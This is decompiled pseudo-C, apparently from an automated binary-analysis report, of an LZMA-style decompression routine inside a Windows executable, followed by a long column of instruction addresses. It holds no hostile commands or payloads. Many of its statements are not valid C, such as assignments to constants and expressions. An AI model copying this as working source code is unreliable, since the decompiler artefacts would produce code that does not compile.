							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d5f
                                                                                              0x00406d64
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00000000
                                                                                              0x0040743e
                                                                                              0x00406d66
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00000000
                                                                                              0x00406f97
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e23
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed3
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x004075e5
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00000000
                                                                                              0x00406e1a
                                                                                              0x00406ea6
                                                                                              0x00406daf
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
